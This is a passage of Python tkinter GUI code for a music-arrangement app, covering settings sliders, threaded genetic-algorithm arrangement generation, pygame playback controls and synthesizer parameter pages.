text=\"Settings\", font=controller.title_font)\n label.grid(row=row, column=2 , columnspan=1, sticky=\"nsew\")\n row+=1\n \n label_bpm = tk.Label(self, text='BPM', font=('Helvetica', \"12\"), justify=\"left\")\n label_bpm.grid(row=row, column=0, sticky = 'S')\n \n slider_length = 300\n \n self.controller.shared_data[\"bpm\"].set(120)\n bpm_entry = tk.Scale(self, variable= self.controller.shared_data[\"bpm\"],\n from_= 80, to = 200, resolution=1, orient=\"horizontal\",\n length = slider_length) \n bpm_entry.grid(row=row, column=2, columnspan=2)\n \n min_bpm = tk.Label(self, text='80', font=('Helvetica', \"10\"))\n min_bpm.grid(row=row, column=1, sticky = 'SE')\n \n max_bpm = tk.Label(self, text='120', font=('Helvetica', \"10\"))\n max_bpm.grid(row=row, column=4, sticky = 'SW')\n\n row+=1\n \n #################### #mod level #############################\n # Create a label for the slider\n mod_label = tk.Label(self, text=\"Mod Level:\", font=('Helvetica', \"12\"), justify=\"left\")\n mod_label.grid(row = row, column=0, padx=10)\n \n info1 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_MOD_LEVEL\"))\n info1.grid(row=row, column=1, sticky = 'S')\n \n # Create a double variable to store the slider value\n mod_var = tk.DoubleVar()\n mod_var.set(0.7) # Set an initial value for the slider\n \n min_mod = tk.Label(self, text='0.1', font=('Helvetica', \"10\"))\n min_mod.grid(row=row, column=1, sticky = 'SE')\n \n max_mod = tk.Label(self, text='1', font=('Helvetica', \"10\"))\n max_mod.grid(row=row, column=4, sticky = 'SW')\n \n # Create the slider widget\n mod_slider = tk.Scale(self, variable=mod_var, from_= 0.1, to = 1.0, resolution=0.01,\n orient=\"horizontal\", \n length = slider_length)\n mod_slider.grid(row = row, column=2, columnspan=2)\n self.controller.shared_data['mod']=mod_var\n row+=1\n \n #################### #mod feeback #############################\n fb_label = tk.Label(self, text=\"Mod Feedback:\", font=('Helvetica', \"12\"), justify=\"left\")\n fb_label.grid(row = row, column=0, padx=10, columnspan=2, sticky = 'W')\n \n info2 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_MOD_FEEDBACK\"))\n info2.grid(row=row, column=1, sticky = 'S')\n \n # Create a double variable to store the slider value\n fb_var = tk.IntVar()\n fb_var.set(1) # Set an initial value for the slider\n \n min_fb = tk.Label(self, text='0', font=('Helvetica', \"10\"))\n min_fb.grid(row=row, column=1, sticky = 'SE')\n \n max_fb = tk.Label(self, text='3', font=('Helvetica', \"10\"))\n max_fb.grid(row=row, column=4, sticky = 'SW')\n \n # Create the slider widget\n fb_slider = tk.Scale(self, variable=fb_var, from_= 0, to=3, orient=\"horizontal\",\n length=slider_length)\n fb_slider.grid(row = row, column=2, columnspan=2)\n self.controller.shared_data['fb']=fb_var\n \n row+=1\n #################### #section_size #############################\n sec_label = tk.Label(self, text=\"Section size\\n (Number of bars):\",\n font=('Helvetica', \"12\"), justify=\"left\")\n sec_label.grid(row = row, column=0, padx=10,columnspan=2, sticky = 'W')\n \n info3 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_SECTION_SIZE\"))\n info3.grid(row=row, column=1, sticky = 'S')\n \n # Create a double variable to store the slider value\n sec_var = tk.IntVar()\n sec_var.set(8) # Set an initial value for the slider\n \n min_sec = tk.Label(self, text='0', font=('Helvetica', \"10\"))\n min_sec.grid(row=row, column=1, sticky = 'SE')\n \n max_sec = tk.Label(self, text='16', font=('Helvetica', \"10\"))\n max_sec.grid(row=row, column=4, sticky = 'SW')\n \n # Create the slider widget\n sec_slider = tk.Scale(self, variable=sec_var, from_= 4, to=16, resolution=4,\n orient=\"horizontal\", length=slider_length)\n sec_slider.grid(row = row, column=2, columnspan=2)\n self.controller.shared_data['section_size']=sec_var\n \n row+=1\n \n ############################## TRAIN CLASSIFICATION #####################################\n row+=1\n train_label = tk.Label(self, text='Custom Instrument\\n Classification',\n font=('Helvetica', \"10\") , justify=\"left\", wraplength=120)\n train_label.grid(row = row, column=0, pady=10, padx=10, columnspan=3, sticky = 'W')\n \n info = tk.Button(self, text=\"Info*\",\n command=lambda: controller.show_frame(\"PageThree\"))\n info.grid(row=row, column=2, pady=10, sticky = 'W')\n \n # Create a boolean variable to store the checkbox value\n train = tk.BooleanVar()\n \n # Create the checkbox\n train_checkbox = tk.Checkbutton(self,\n variable=train, compound=\"right\") #, anchor=\"w\"\n self.controller.shared_data['train']=train\n \n # Position the checkbox and filename entry widgets in the GUI window\n train_checkbox.grid(row=row, column=1, columnspan=1, pady=10, sticky = 'nsew')\n row+=1\n \n button2 = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageOne\"))\n \n button3 = tk.Button(self, text=\"Next\", font=('Helvetica', 18),\n command= lambda: controller.show_frame(\"PageFour\"))\n \n #button1.grid(row=row, column=0, pady=10)\n button2.grid(row=row, column=0, columnspan=2, pady=30, padx=20, sticky='w')\n button3.grid(row=row, column=4, pady=30, padx=20)\n\n #to join the two functions in a button: \n #combine_funcs(lambda: fun1(arguments), lambda: fun2(arguments))\n #https://www.geeksforgeeks.org/how-to-bind-multiple-commands-to-tkinter-button/\n \n\n \nclass PageThree(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n label = tk.Label(self, text=\"Train your own Model!\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text_train= 'Before picking samples for the final arrangement, we first have to classify all samples by Instrument Type.\\n'\n text_train2 = 'You can train your own Instrument Classification Model by placing Samples in each Instrument category (BASS, HARMONY and MELODY) on the folders at \".../dubgen_APP/user/train_sounds\"'\n \n train_info = tk.Label(self, text=text_train,\n font=('Helvetica', 18), wraplength=500)\n train_info.pack(expand=True, padx=20)\n \n train_info2 = tk.Label(self, text=text_train2,\n font=('Helvetica', 18), wraplength=500)\n train_info2.pack(expand=True, padx=20)\n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageTwo\"))\n button.pack(expand=True, padx=20)\n \n \nclass PageFour(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n row=0\n \n label = tk.Label(self, text=\"Create Arrangement!\", font=controller.title_font) \n #label.grid(row=row, column=0 , columnspan=3, sticky=\"nsew\", pady=100)\n row+=1 \n label.pack(side=\"top\", fill=\"both\", pady=10, expand=True)\n \n self.button1 = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageTwo\"))\n \n self.t1=threading.Thread(target=self.run_sampling) #init thread\n \n self.button2 = tk.Button(self, text=\"Start\", font=('Helvetica', 18),\n command= combine_funcs(self.Threading,\n lambda: self.button2.config(text=\"Creating...\", state=tk.DISABLED, width=35)))\n \n self.button2.pack( pady=10, expand=True)\n row+=1\n self.button1.pack( pady=10, expand=True, side='left')\n \n #self.out_sampling = {'midi_list': list()}\n self.out_ga = {'music_path': 'init', 'best_score': float(0.0)}\n \n \n def Threading(self):\n # Call work function\n self.event = threading.Event()\n\n self.t1.start()\n \n def run_sampling(self): \n path = self.controller.shared_data[\"main_path\"]\n bpm = self.controller.shared_data[\"bpm\"].get()\n mod = self.controller.shared_data[\"mod\"].get()\n fb = self.controller.shared_data[\"fb\"].get()\n section_size = self.controller.shared_data[\"section_size\"].get()\n \n user_data = user_input(bpm, path, mod, fb, section_size)\n \n self.button1.configure(text = \"Go Back\", state= tk.DISABLED)\n\n from main import Sampling_and_Mod\n train_bool=self.controller.shared_data['train'].get()\n \n if train_bool==True:\n train=1\n else: train=0\n\n \n user_info, midi_info_out, sample_info, sample_train_info, section_info, midi_info_real = Sampling_and_Mod(user_data, self.event ,\n train, self.button2)\n \n \n self.out_sampling = {'user_info': user_info, 'midi_info_out': midi_info_out,\n 'sample_info': sample_info, 'sample_train_info': sample_train_info,\n 'section_info': section_info, 'midi_info_real': midi_info_real}\n \n \n ######################################### GA PREPOP ###################################################\n \n self.in_pp = self.out_sampling #input genetic\n \n from main import main_GA_PREPOP\n info_GA, class_idx, Pop, df = main_GA_PREPOP(self.in_pp['user_info'],\n self.in_pp['midi_info_out'], self.in_pp['sample_info'], self.button2)\n \n \n self.out_ga_prepop = {'info_GA': info_GA , 'class_idx': class_idx , 'Pop': Pop , 'df': df}\n \n self.in_gen1 = self.out_ga_prepop #input genetic from prepop\n self.in_gen2 = self.out_sampling #input genetic from sampling\n\n \n ######################################### GA ###################################################\n from main import main_GA\n music_path, best_score, sample_Ind = main_GA(self.in_gen2['user_info'], self.in_gen2['sample_info'],\n self.in_gen1['class_idx'], self.in_gen2['midi_info_out'],\n self.in_gen1['Pop'], self.in_gen1['df'], self.in_gen1['info_GA'],\n self.in_gen2['midi_info_real'], self.button2)\n \n \n self.out_ga = {'music_path': music_path, 'best_score': best_score, 'sample_Ind': sample_Ind}\n #'''\n \n \n #reconfigure button to pass to next phase\n self.button2.configure(text = \"Listen to Arrangement!\", font=('Helvetica', 16),\n command = lambda: self.controller.show_frame(\"PageFive\"),\n state=tk.NORMAL, width=25)\n \n\n \n def stop_thread(self): #stop the thread\n self.button3.configure(text = \"Stopping Thread...\", state= tk.DISABLED)\n \n if self.t1.is_alive():\n self.event.set()\n print('Stopping Thread...')\n self.t1.join() #wait for thread to end \n \n self.button3.configure(text = \"Stop\", state= tk.NORMAL)\n\n\n def change_layout4(self):\n self.button2.configure(text = \"Stop\", command = self.stop_thread)\n\n \nclass PageFive(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(7):\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n # Give the center column a weight of 1\n #self.grid_columnconfigure(2, weight=1)\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n label6 = tk.Label(self, text=\" \")\n label6.grid(row=0, column=5)\n \n label7 = tk.Label(self, text=\" \")\n label7.grid(row=0, column=6)\n \n row=1\n \n label = tk.Label(self, text=\"Listen to the Arrangement\", font=controller.title_font)\n label.grid(row=row, column=0, columnspan=7, pady=10)\n row+=1\n \n main_path = self.controller.shared_data[\"main_path\"]\n \n #create playlist mixer\n self.mixer = pygame.mixer\n self.mixer.init()\n\n\n ###################################### icons ####################################\n #icon_path = main_path + '/GUI/icons/'\n icon_path = main_path + '/icons/'\n \n play_img = Image.open(icon_path + 'play.png')\n pause_img = Image.open( icon_path + 'pause.png')\n stop_img = Image.open( icon_path + 'stop.png')\n backward_img = Image.open( icon_path + 'backward.png')\n forward_img = Image.open( icon_path + 'forward.png')\n \n play_img = play_img.resize((20, 20))\n pause_img = pause_img.resize((20, 20))\n stop_img = stop_img.resize((20, 20))\n backward_img = backward_img.resize((20, 20))\n forward_img = forward_img.resize((20, 20))\n \n play_icon = ImageTk.PhotoImage(image = play_img, master = controller)\n pause_icon = ImageTk.PhotoImage(image = pause_img, master = controller)\n stop_icon = ImageTk.PhotoImage(image = stop_img, master = controller)\n backward_icon = ImageTk.PhotoImage(image = backward_img, master = controller)\n forward_icon = ImageTk.PhotoImage(image = forward_img, master = controller)\n \n ########################################## mp3 #######################################\n mp3_frame = tk.Frame(self, padx=10, pady=10,\n highlightbackground=\"black\", highlightthickness=1)\n mp3_frame.grid(row=row, column=1, columnspan=5, pady=10, sticky='nsew')\n \n for i in range(5):\n mp3_frame.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n pady_mp3 = 20\n \n self.paused = False\n self.save_start = 0\n \n play_btn = tk.Button(mp3_frame, image=play_icon, borderwidth=0, command= self.Play_Song)\n pause_btn = tk.Button(mp3_frame, image=pause_icon, borderwidth=0, command= self.Pause_Song)\n stop_btn = tk.Button(mp3_frame, image=stop_icon, borderwidth=0, command= self.Stop_Song)\n backward_btn = tk.Button(mp3_frame, image=backward_icon, borderwidth=0, command= self.Backward_Song)\n forward_btn = tk.Button(mp3_frame, image=forward_icon, borderwidth=0, command= self.Forward_Song)\n \n play_btn.image = play_icon\n pause_btn.image = pause_icon\n stop_btn.image = stop_icon\n backward_btn.image = backward_icon\n forward_btn.image = forward_icon\n \n backward_btn.grid(row = row, column = 0, pady=pady_mp3, sticky='nsew')\n stop_btn.grid(row = row, column = 1, pady=pady_mp3, sticky='nsew')\n play_btn.grid(row = row, column = 2, pady=pady_mp3, sticky='nsew')\n pause_btn.grid(row = row, column = 3, pady=pady_mp3, sticky='nsew')\n forward_btn.grid(row = row, column = 4, pady=pady_mp3, sticky='nsew')\n \n row+=1\n \n ######################################## volume #######################################\n \n def set_volume(val):\n volume = float(val) / 100\n self.mixer.music.set_volume(volume)\n \n label_vol = tk.Label(mp3_frame, text=\"Volume\", font=('Helvetica', 16))\n label_vol.grid(row=row, column=0, columnspan=5, sticky='s')\n row+=1\n \n vol_slider = tk.Scale(mp3_frame, from_=0, to=100, orient='horizontal', command= set_volume,\n length= 300)\n vol_slider.set(50)\n vol_slider.grid(row = row, column=1, columnspan=3)#, pady=10)\n row+=1\n \n ######################################################################################\n \n go_synth = tk.Button(self, text=\"Go to Synthesizer\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageSix\"))\n go_synth.grid(row = row, column=4, columnspan=2, pady=50, sticky='E')\n \n def close_window():\n self.controller.destroy()\n \n close_button = tk.Button(self, text=\"Close\", font=('Helvetica', 18),\n command=close_window)\n close_button.grid(row = row, column=3, columnspan=1, pady=50)\n row+=1\n \n def Play_Song(self):\n self.results = self.controller.frames['PageFour'].out_ga\n song_path = self.results['music_path']\n #print('music path: ', song_path)\n \n self.mixer.music.load(song_path)\n self.mixer.music.play(loops=0)\n \n def Stop_Song(self):\n self.mixer.music.stop()\n \n self.start=0\n \n def Pause_Song(self):\n \n if self.paused:\n #unpause \n self.mixer.music.unpause()\n self.paused = False\n else:\n #pause\n self.mixer.music.pause()\n self.paused = True\n \n def Forward_Song(self):\n \n start = self.save_start\n \n play_time = self.mixer.music.get_pos()\n\n start += (play_time/1000.0) + 5\n \n self.mixer.music.pause()\n \n self.save_start = start\n #print('Current Time in Song:', start)\n \n self.mixer.music.play(loops=0, start = start)\n \n def Backward_Song(self):\n start = self.save_start\n \n play_time = self.mixer.music.get_pos()\n\n start += (play_time/1000.0) - 5\n \n # mixer.music.pause()\n self.mixer.music.pause()\n \n self.save_start = start\n #print('Current Time in Song:', start)\n \n self.mixer.music.play(loops=0, start = start)\n \n def set_volume(self):\n volume = float(self.vol) / 100\n self.mixer.music.set_volume(volume)\n \n \nclass PageSix(tk.Frame): \n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(7):\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n label6 = tk.Label(self, text=\" \")\n label6.grid(row=0, column=5)\n \n label7 = tk.Label(self, text=\" \")\n label7.grid(row=0, column=6)\n \n row=1\n \n label = tk.Label(self, text=\"Synthesizer\", font=controller.title_font)\n label.grid(row=row, column=2, columnspan=3)\n row+=1\n \n #maximum number of sections (that can be parameterized)\n self.max_sections = 5\n \n ############################# Customize Parameters ###############################\n def toggle_buttons():\n if self.custom.get():\n synth_af.config(state=tk.NORMAL)\n synth_gr.config(state=tk.NORMAL)\n synth_ip.config(state=tk.NORMAL)\n \n menu_af.config(state=tk.NORMAL)\n menu_gr.config(state=tk.NORMAL)\n menu_ip.config(state=tk.NORMAL)\n else:\n synth_af.config(state=tk.DISABLED)\n synth_gr.config(state=tk.DISABLED)\n synth_ip.config(state=tk.DISABLED)\n \n menu_af.config(state=tk.DISABLED)\n menu_gr.config(state=tk.DISABLED)\n menu_ip.config(state=tk.DISABLED)\n \n \n # Create a boolean variable to store the checkbox value\n self.custom = tk.BooleanVar()\n self.custom.set(False)\n \n # Create the checkbox\n custom_checkbox = tk.Checkbutton(self, text=\"Customize Parameters\",\n variable = self.custom,\n command=toggle_buttons)\n \n # Position the checkbox and filename entry widgets in the GUI window\n custom_checkbox.grid(row=row, column=1, columnspan=3, sticky=\"w\", padx=10, pady=10)\n \n info0 = tk.Button(self, text=\" Info* \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_CUSTOMIZE_PARAMETERS\"))\n info0.grid(row=row, column=2)\n \n row+=1\n \n ############################# Synth Parameters ##################################\n param_frame = tk.Frame(self, padx=10, \n highlightbackground=\"black\", highlightthickness=1)\n param_frame.grid(row=row, column=1, columnspan=5, pady=10, sticky='nsew')\n \n # Create five columns\n for i in range(5):\n param_frame.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n\n \n # Place widgets using grid()\n label1 = tk.Label(param_frame, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(param_frame, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(param_frame, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(param_frame, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(param_frame, text=\" \")\n label5.grid(row=0, column=4)\n \n param_row=0\n label_synths = tk.Label(param_frame, text=\"Synth Units Parameters\",\n font=('Helvetica', 16))\n label_synths.grid(row=param_row, column=0, columnspan=3, sticky='w')\n param_row+=1\n \n self.af_param = list()\n self.gr_param = list()\n self.ip_param = list()\n \n synth_af = tk.Button(param_frame, text=\"Auto-Filter\", state=tk.DISABLED,\n command=lambda: controller.show_frame(\"PageSeven\"))\n synth_gr = tk.Button(param_frame, text=\"Granular\", state=tk.DISABLED,\n command=lambda: controller.show_frame(\"PageEight\"))\n synth_ip = tk.Button(param_frame, text=\"Interpolator\", state=tk.DISABLED,\n command=lambda: controller.show_frame(\"PageNine\"))\n \n synth_pad=20\n synth_af.grid(row=param_row, column=0, pady=synth_pad, padx=20)\n synth_gr.grid(row=param_row, column=2, pady=synth_pad, padx=20)\n synth_ip.grid(row=param_row, column=4, pady=synth_pad, padx=20)\n row+=1\n \n ############################# Synth Instruments #################################\n inst_frame = tk.Frame(self, padx=10,\n highlightbackground=\"black\", highlightthickness=1)\n inst_frame.grid(row=row, column=1, columnspan=5, pady=10, sticky='nsew')\n \n # Create five columns\n for i in range(5):\n inst_frame.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n \n # Place widgets using grid()\n label12 = tk.Label(inst_frame, text=\" \")\n label12.grid(row=0, column=0)\n \n label22 = tk.Label(inst_frame, text=\" \")\n label22.grid(row=0, column=1)\n \n label32 = tk.Label(inst_frame, text=\" \")\n label32.grid(row=0, column=2)\n \n label42 = tk.Label(inst_frame, text=\" \")\n label42.grid(row=0, column=3)\n \n label52 = tk.Label(inst_frame, text=\" \")\n label52.grid(row=0, column=4)\n \n inst_row=1\n label_inst = tk.Label(inst_frame, text=\"Choose Synths' Instruments\",\n font=('Helvetica', 16))\n label_inst.grid(row=param_row, column=0, columnspan=3, sticky='w')\n inst_row+=1\n \n \n OPTIONS = [\"Bass\", \"Harmony\", \"Melody\"]\n \n def check_combination(menu_vars, button):\n if len(set(menu_vars)) == len(menu_vars):\n button.config(state=\"normal\")\n else:\n button.config(state=\"disabled\")\n \n self.inst_af = tk.StringVar(value=\"Bass\")\n self.inst_gr = tk.StringVar(value=\"Harmony\")\n self.inst_ip = tk.StringVar(value=\"Melody\")\n \n def set_inst_af(self, value):\n self.inst_af.set(str(value))\n def set_inst_gr(self, value):\n self.inst_gr.set(str(value))\n def set_inst_ip(self, value):\n self.inst_ip.set(str(value))\n \n menu_af = tk.OptionMenu(inst_frame, self.inst_af, *OPTIONS, \n command= combine_funcs(lambda selected: check_combination([self.inst_af.get(),\n self.inst_gr.get(), self.inst_ip.get()], self.start_synth),\n lambda value: set_inst_af(self,value)))\n \n \n menu_gr = tk.OptionMenu(inst_frame, self.inst_gr, *OPTIONS, \n command= combine_funcs(lambda selected: check_combination([self.inst_af.get(),\n self.inst_gr.get(), self.inst_ip.get()], self.start_synth),\n lambda value: set_inst_gr(self,value)))\n \n\n menu_ip = tk.OptionMenu(inst_frame, self.inst_ip, *OPTIONS, \n command= combine_funcs(lambda selected: check_combination([self.inst_af.get(),\n self.inst_gr.get(), self.inst_ip.get()], self.start_synth),\n lambda value: set_inst_ip(self,value)))\n \n menu_af.config(state=\"disabled\")\n menu_gr.config(state=\"disabled\")\n menu_ip.config(state=\"disabled\")\n \n pad_menu=20\n menu_af.grid(row=inst_row, column=0, pady=pad_menu, padx=20)\n menu_gr.grid(row=inst_row, column=2, pady=pad_menu, padx=20)\n menu_ip.grid(row=inst_row, column=4, pady=pad_menu, padx=20)\n \n initial_values = [self.inst_af.get(), self.inst_gr.get(), self.inst_ip.get()]\n if len(set(initial_values)) == len(initial_values):\n initial_state = \"normal\"\n else:\n initial_state = \"disabled\"\n \n self.t_synth=threading.Thread(target=self.run_synth) \n \n self.start_synth = tk.Button(self, text=\"Start Synthesis\",\n font=('Helvetica', 18), state=initial_state,\n command=combine_funcs(lambda: self.start_synth.config(text=\"Creating...\",\n state= tk.DISABLED, width = 40),\n self.Threading))#controller.show_frame(\"PageTen\"))\n self.start_synth.config(width=20)\n\n row+=1\n \n self.start_synth.grid(row=row, column=1, columnspan=5, pady=20)\n row+=1\n\n #################################################################################################\n \n def Threading(self):\n # Call work function\n self.event = threading.Event()\n\n self.t_synth.start()\n \n def run_synth(self):\n \n #get synths vector (which synth was chosen for each instrument) #############################\n synth_id={'Bass': 0, 'Harmony': 1, 'Melody': 2}\n synths=[-1,-1,-1]\n \n #discover idx of that synth, in the order bass harmony melody\n idx_af = synth_id[str(self.inst_af.get())]\n idx_gr = synth_id[str(self.inst_gr.get())]\n idx_ip = synth_id[str(self.inst_ip.get())]\n \n #for that idx insert the code of that synth-> 0: af; 1:gr, 2:ip\n synths[idx_af] = 0\n synths[idx_gr] = 1\n synths[idx_ip] = 2\n \n ######################### ALOCATE PARAMETERS FOR IND_SYNTH ################################\n if self.custom.get():\n af_param = self.af_param\n gr_param = self.gr_param\n ip_param = self.ip_param\n \n params_synths = [af_param, gr_param, ip_param]\n Ind_synth = [-1,-1,-1]\n\n idxs = [idx_af, idx_gr, idx_ip]\n #place synth params in the correct instrument: Ind_param[param_bass, param_harmony, param_melody]\n for idx, params in zip(idxs, params_synths):\n Ind_synth[idx] = params\n else: Ind_synth=list()\n #############################################################################################\n \n user_info = self.controller.frames['PageFour'].in_gen2['user_info']\n midi_info_out = self.controller.frames['PageFour'].in_gen2['midi_info_out']\n info_GA = self.controller.frames['PageFour'].in_gen1['info_GA']\n sample_info = self.controller.frames['PageFour'].in_gen2['sample_info']\n Ind_sample = self.controller.frames['PageFour'].out_ga['sample_Ind']\n midi_info_real = self.controller.frames['PageFour'].in_gen2['midi_info_real']\n \n from main import main_synth_GA\n synth_path = main_synth_GA(user_info, midi_info_out, info_GA, sample_info,\n Ind_sample, Ind_synth, synths, midi_info_real, self.start_synth)\n \n self.out_synth_path = synth_path\n \n \n self.start_synth.configure(text = \"Listen to Arrangement!\", state= tk.NORMAL, width = 25,\n command = lambda: self.controller.show_frame(\"PageTen\"))\n \nclass PageSeven(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(5):\n if i!=2:\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n row = 1\n \n slider_length = 300\n row+=1\n \n row=0\n \n label = tk.Label(self, text=\"Auto-Filter\", font=controller.title_font)\n #label.pack(side=\"top\", fill=\"x\", pady=10)\n label.grid(row=row, column=1 , columnspan=3, pady=20, sticky=\"nsew\")\n row+=1\n \n ################################# INIT VARIABLES ###################################\n #cutoff_floor=50\n self.cutoff_floor = tk.DoubleVar()\n self.cutoff_ceiling = tk.DoubleVar()\n self.lfo_floor = tk.DoubleVar()\n self.lfo_ceiling = tk.DoubleVar()\n self.lfo_shape = tk.StringVar(value=\"sine\")\n self.lfo_evo = tk.StringVar(value=\"random\")\n self.high_pass = tk.BooleanVar()\n \n self.cutoff_floor.set(20) \n self.cutoff_ceiling.set(10_000) \n self.lfo_floor.set(1) \n self.lfo_ceiling.set(8) \n\n self.high_pass.set(False)\n \n self.min_cutoff_floor = 8\n self.max_cutoff_floor = 199\n self.min_cutoff_ceiling = 200\n self.max_cutoff_ceiling = 20_000\n self.min_lfo_floor = 0.01\n self.max_lfo_floor = 4.9\n self.min_lfo_ceiling = 5\n self.max_lfo_ceiling = 10\n \n \n def set_cutoff_floor(self, value):\n self.cutoff_floor.set(float(value))\n def set_cutoff_ceiling(self, value):\n self.cutoff_ceiling.set(float(value))\n def set_lfo_floor(self, value):\n self.lfo_floor.set(float(value))\n def set_lfo_ceiling(self, value):\n self.lfo_ceiling.set(float(value))\n def set_lfo_shape(self, value):\n self.lfo_shape.set(str(value))\n def set_lfo_evo(self, value):\n self.lfo_evo.set(str(value))\n def set_high_pass(self, value):\n self.high_pass.set(bool(value))\n \n ########################################## SLIDERS #######################################\n \n cutoff_floor_slider = tk.Scale(self, variable=self.cutoff_floor, from_= self.min_cutoff_floor,\n to=self.max_cutoff_floor, resolution=1, orient = 'horizontal',\n length = slider_length,\n command= lambda value: set_cutoff_floor(self,value))\n \n cutoff_ceiling_slider = tk.Scale(self, variable=self.cutoff_ceiling, from_= self.min_cutoff_ceiling,\n to=self.max_cutoff_ceiling, resolution=1, orient = 'horizontal',\n length = slider_length,\n command= lambda value: set_cutoff_ceiling(self,value))\n \n lfo_floor_slider = tk.Scale(self, variable=self.lfo_floor, from_= self.min_lfo_floor, \n to= self.max_lfo_floor, resolution=0.1, orient = 'horizontal',\n length = slider_length,\n command= lambda value: set_lfo_floor(self,value))\n \n lfo_ceiling_slider = tk.Scale(self, variable=self.lfo_ceiling, from_= self.min_lfo_ceiling,\n to=self.max_lfo_ceiling, resolution=0.1, orient = 'horizontal',\n length = slider_length,\n command= lambda value: set_lfo_ceiling(self,value))\n \n ######################################### MENUS ####################################\n shapes = ['sine', 'square', 'triangle', 'sawl', 'sawr']\n evos = ['constant', 'linear_up', 'linear_down', 'exp_up', 'exp_down', 'random']\n \n menu_lfo_shape = tk.OptionMenu(self, self.lfo_shape, *shapes, \n command= lambda value: set_lfo_shape(self,value))\n menu_lfo_evo = tk.OptionMenu(self, self.lfo_evo, *evos, \n command= lambda value: set_lfo_evo(self,value))\n \n high_pass_checkbox = tk.Checkbutton(self, text=\"High-Pass Filter\", variable=self.high_pass, anchor='w',\n command= lambda value: set_high_pass(self, value)) \n\n ######################################### GRID ####################################\n ## CUTOFF FLOOR ##########################\n \n label_cutoff_floor = tk.Label(self, text='Cutoff Minimum', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_cutoff_floor.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info1 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_CUTOFF\"))\n info1.grid(row=row, column=1, sticky = 'S')\n \n cutoff_floor_slider.grid(row=row, column=2, columnspan=2)\n \n cutoff_floor_min = tk.Label(self, text = str(self.min_cutoff_floor),\n font=('Helvetica', \"10\"))\n cutoff_floor_min.grid(row=row, column=1, sticky = 'SE')\n \n cutoff_floor_max = tk.Label(self, text=str(self.max_cutoff_floor)+ \" Hz\",\n font=('Helvetica', \"10\"))\n cutoff_floor_max.grid(row=row, column=4, sticky = 'SW')\n row+=1\n \n ## CUTOFF CEILING ##########################\n \n label_cutoff_ceiling = tk.Label(self, text='Cutoff Maximum', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_cutoff_ceiling.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info2 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_CUTOFF\"))\n info2.grid(row=row, column=1, sticky = 'S')\n \n \n cutoff_ceiling_slider.grid(row=row, column=2, columnspan=2)\n \n cutoff_ceiling_min = tk.Label(self, text = str(self.min_cutoff_ceiling),\n font=('Helvetica', \"10\"))\n cutoff_ceiling_min.grid(row=row, column=1, sticky = 'SE')\n \n cutoff_ceiling_max = tk.Label(self, text=str(20)+'K'+ \" Hz\",\n font=('Helvetica', \"10\"))\n cutoff_ceiling_max.grid(row=row, column=4, sticky = 'SW')\n row+=1\n \n ## LFO FLOOR ##########################\n \n label_lfo_floor = tk.Label(self, text='LFO Minimum', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_lfo_floor.grid(row=row, column=0, 